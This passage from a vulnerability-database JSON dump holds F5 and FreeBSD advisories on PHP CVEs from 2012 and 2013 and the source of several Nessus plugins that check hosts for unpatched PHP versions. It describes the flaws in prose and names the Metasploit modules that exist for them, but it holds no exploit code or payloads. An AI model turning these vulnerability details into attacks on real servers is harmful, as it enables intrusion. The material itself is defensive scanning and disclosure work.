\n| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None \nARX| None| 6.1.1 - 6.4.0 \n5.0.0 - 5.3.1 \n| None \nEnterprise Manager| None| 3.0.0 - 3.1.1 \n2.0.0 - 2.3.0| None \nFirePass| None| 7.0.0 \n6.1.0| None \nBIG-IQ Cloud| None \n| 4.0.0 - 4.3.0 \n| None \nBIG-IQ Device| None| 4.2.0 - 4.3.0| None \nBIG-IQ Security| None \n| 4.0.0 - 4.3.0 \n| None \nLineRate| None| 2.2.0 - 2.4.0| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-06T16:50:00", "published": "2014-08-07T04:25:00", "id": "F5:K15478", "href": "https://support.f5.com/csp/article/K15478", "title": "PHP vulnerability CVE-2012-2386", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-07-25T21:02:19", "bulletinFamily": "software", "cvelist": ["CVE-2012-2386"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-07-25T00:00:00", "published": "2014-08-06T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15478.html", "id": "SOL15478", "title": "SOL15478 - PHP vulnerability CVE-2012-2386", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-06-08T06:18:20", "bulletinFamily": "software", "cvelist": ["CVE-2013-1643"], "edition": 1, "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | \nNone \n| 9.0.0 - 9.6.1 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| \nNone \nBIG-IP AAM | None | 11.4.0 | None \nBIG-IP AFM | \nNone | 11.3.0 - 11.4.0 \n| None \nBIG-IP Analytics | \nNone | 11.0.0 - 11.4.0 \n| None \nBIG-IP APM | \nNone | 10.1.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP ASM | \nNone | 9.2.0 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP Edge Gateway \n| \nNone | 10.1.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP GTM | \nNone | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP Link Controller | \nNone \n| 9.2.2 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n \n| None \nBIG-IP PEM | \nNone \n| 11.3.0 - 11.4.0 \n \n| None \nBIG-IP PSM | \nNone | 9.4.5 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP WebAccelerator | \nNone | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.3.0 \n| None \nBIG-IP WOM | \nNone | 10.0.0 - 10.2.4 \n11.0.0 - 11.3.0 \n| None \nARX | \nNone | 5.0.0 - 5.3.1 \n6.0.0 - 6.4.0 \n| None \nEnterprise Manager | \nNone | 1.6.0 - 1.8.0 \n2.0.0 - 2.3.0 \n3.0.0 - 3.1.1 \n| None \nFirePass | \nNone | 6.0.0 - 6.1.0 \n7.0.0 \n| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2017-03-14T22:30:00", "published": "2013-05-30T21:31:00", "href": "https://support.f5.com/csp/article/K14433", "id": "F5:K14433", "title": "PHP SOAP vulnerability CVE-2013-1643", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:01", "bulletinFamily": "software", "cvelist": ["CVE-2013-1643"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-25T00:00:00", "published": "2013-05-30T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/400/sol14433.html", "id": "SOL14433", "title": "SOL14433 - PHP SOAP vulnerability CVE-2013-1643", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:28", "bulletinFamily": "software", "cvelist": ["CVE-2013-1635"], "edition": 1, "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | None \n| 9.0.0 - 9.6.1 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| \nNone \nBIG-IP AAM | None | 11.4.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.4.0 \n| None \nBIG-IP Analytics | None | 11.0.0 - 11.4.0 \n| None \nBIG-IP APM | \nNone | 10.1.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP ASM | \nNone | 9.2.0 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP Edge Gateway \n| \nNone | 10.1.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP GTM | \nNone | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP Link Controller | \nNone \n| 9.2.2 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP PEM | \nNone \n| 11.3.0 - 11.4.0 \n| None \nBIG-IP PSM | \nNone | 9.4.5 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.4.0 \n| None \nBIG-IP WebAccelerator | \nNone | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.4 \n11.0.0 - 11.3.0 \n| None \nBIG-IP WOM | \nNone | 10.0.0 - 10.2.4 \n11.0.0 - 11.3.0 \n| None \nARX | \nNone | 5.0.0 - 5.3.1 \n6.0.0 - 6.4.0 \n| None \nEnterprise Manager | \nNone | 1.6.0 - 1.8.0 \n2.0.0 - 2.3.0 \n3.0.0 - 3.1.1 \n| None \nFirePass | \nNone | 6.0.0 - 6.1.0 \n7.0.0 \n| None\n\nNone \n\n\n * [CVE-2013-1635](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1635>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2016-06-28T23:47:00", "published": "2013-05-30T22:33:00", "href": "https://support.f5.com/csp/article/K14432", "id": "F5:K14432", "type": "f5", "title": "PHP SOAP wdsl cache file vulnerability CVE-2013-1635", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-1635"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone \n\n\nSupplemental Information\n\n * [CVE-2013-1635](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1635>)\n\n**Note**: The previous link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-06-28T00:00:00", "published": "2013-05-30T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/400/sol14432.html", "id": "SOL14432", "title": "SOL14432 - PHP SOAP wdsl cache file vulnerability CVE-2013-1635", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "description": "\nThe PHP Development Team reports:\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\n\t vulnerability in CGI-based setups as originally described in\n\t CVE-2012-1823. (CVE-2012-2311)\nNote: mod_php and php-fpm are not vulnerable to this attack.\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\n\t apache_request_headers() (CVE-2012-2329).\n\n", "edition": 4, "modified": "2012-05-08T00:00:00", "published": "2012-05-08T00:00:00", "id": "59B68B1E-9C78-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7628.NASL", "href": "https://www.tenable.com/plugins/nessus/59268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7628.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59268);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7628\");\n\n script_name(english:\"Fedora 17 : maniadrive-1.2-40.fc17 / php-5.4.3-1.fc17 (2012-7628)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311). PHP 5.4.3 fixes a buffer overflow vulnerability in\nthe apache_request_headers() (CVE-2012-2329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080952.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1eea669\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a831d09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected maniadrive and / or php packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"maniadrive-1.2-40.fc17\")) flag++;\nif (rpm_check(release:\"FC17\", reference:\"php-5.4.3-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:01", "description": "The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. (CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).", "edition": 22, "published": "2012-05-14T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php53", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php52"], "id": "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "href": "https://www.tenable.com/plugins/nessus/59084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59084);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\", \"CVE-2012-2329\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (59b68b1e-9c78-11e1-b5e0-000c299b62e1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Development Team reports :\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\nvulnerability in CGI-based setups as originally described in\nCVE-2012-1823. (CVE-2012-2311)\n\nNote: mod_php and php-fpm are not vulnerable to this attack.\n\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\napache_request_headers() (CVE-2012-2329).\"\n );\n # https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e50f899\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP apache_request_headers Function Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5>5.4<5.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php53<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php52<5.2.17_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:25:53", "description": "According to its banner, the version of PHP installed on the remote\nhost is 5.4.x earlier than 5.4.3. It is, therefore, potentially\naffected the following vulnerabilities : \n\n - The fix for CVE-2012-1823 does not completely correct\n the CGI query parameter vulnerability. Disclosure of\n PHP source code and code execution are still possible.\n Note that this vulnerability is exploitable only when\n PHP is used in CGI-based configurations. Apache with\n 'mod_php' is not an exploitable configuration.\n (CVE-2012-2311, CVE-2012-2335, CVE-2012-2336)\n\n - An unspecified buffer overflow exists related to the\n function 'apache_request_headers'. (CVE-2012-2329)", "edition": 25, "published": "2012-05-09T00:00:00", "title": "PHP 5.4.x < 5.4.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-2335", "CVE-2012-1823", "CVE-2012-2329"], "modified": "2012-05-09T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_3.NASL", "href": "https://www.tenable.com/plugins/nessus/59057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59057);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2012-2311\",\n \"CVE-2012-2329\",\n \"CVE-2012-2335\",\n \"CVE-2012-2336\"\n );\n script_bugtraq_id(53388, 53455);\n script_xref(name:\"CERT\", value:\"520827\");\n\n script_name(english:\"PHP 5.4.x < 5.4.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is 5.4.x earlier than 5.4.3. It is, therefore, potentially\naffected the following vulnerabilities : \n\n - The fix for CVE-2012-1823 does not completely correct\n the CGI query parameter vulnerability. Disclosure of\n PHP source code and code execution are still possible.\n Note that this vulnerability is exploitable only when\n PHP is used in CGI-based configurations. Apache with\n 'mod_php' is not an exploitable configuration.\n (CVE-2012-2311, CVE-2012-2335, CVE-2012-2336)\n\n - An unspecified buffer overflow exists related to the\n function 'apache_request_headers'. (CVE-2012-2329)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=61910\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/archive/2012.php#id2012-05-08-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.4.3\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.4.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP apache_request_headers Function Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.4\\.[0-2]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.4.3\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:C/I:P/A:P"}}, {"lastseen": "2021-01-07T11:53:46", "description": "Multiple vulnerabilities has been identified and fixed in php :\n\nThere is a programming error in the DES implementation used in crypt()\nin ext/standard/crypt_freesec.c when handling input which contains\ncharacters that can not be represented with 7-bit ASCII. When the\ninput contains characters with only the most significant bit set\n(0x80), that character and all characters after it will be ignored\n(CVE-2012-2143).\n\nAn integer overflow, leading to heap-based buffer overflow was found\nin the way Phar extension of the PHP scripting language processed\ncertain fields by manipulating TAR files. A remote attacker could\nprovide a specially crafted TAR archive file, which once processed in\nan PHP application using the Phar extension could lead to denial of\nservice (application crash), or, potentially arbitary code execution\nwith the privileges of the user running the application\n(CVE-2012-2386).\n\nThe updated php packages have been upgraded to the 5.3.14 version\nwhich is not vulnerable to these issues.", "edition": 25, "published": "2012-06-15T00:00:00", "title": "Mandriva Linux Security Advisory : php 